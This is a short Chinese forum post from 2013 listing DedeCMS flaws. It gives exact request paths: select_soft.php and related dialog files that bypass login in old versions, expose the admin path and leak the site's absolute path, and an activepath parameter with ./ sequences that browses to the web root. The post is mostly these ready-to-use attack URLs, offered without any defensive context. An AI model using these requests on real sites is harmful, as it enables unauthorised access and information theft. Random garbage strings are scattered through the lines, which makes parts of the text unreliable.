1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
2 @ f7 y( T+ v, [" @) Q
: n2 r0 r3 |5 ~7 x0 q员帐号,新版本的就直接转向了后台.+ x/ k1 S' B* [# D
: q+ @# v! t: {0 Q" @
2.include/dialog/config.php会爆出后台管理路径
# n2 v" {5 ^+ z: A+ w. W: o# g
, A. u4 c+ P6 u/ _1 `9 K3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录) N4 v# H/ z" b1 r" ~6 D
" o- i1 O+ k- f, a8 q( I) P! c4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.( g4 @: v: O- F$ B: m0 o! V2 i
' U. O' {$ l: z, L
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
7 Q' m# r7 U5 c7 l0 ~* Z$ }: R" a8 g& W0 D5 r( ~: F4 U, M
到根目录去.不过这些版本的访问地址有些不同.* P' @6 @' ?( ^, v
地址为require/dialog/select_soft.php?activepath=/././././././././
: s w% l0 K, _0 B1 \
/ P. h X, t! M, d% x0 o: _include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
7 V4 L% v: ?2 Z% m* Y' ^存在相同问题的文件还有" Z/ O4 V4 y) C; Z& l; W
include\dialog\select_images.php
3 S) n" k9 o/ U7 S) Winclude\dialog\select_media.php
# ^5 O. C! `% linclude\dialog\select_templets.php& k- {9 Q, y: N8 ?2 d% B @$ ^$ u
|
发表于 2013-4-16 16:50:43
收藏
支持
反对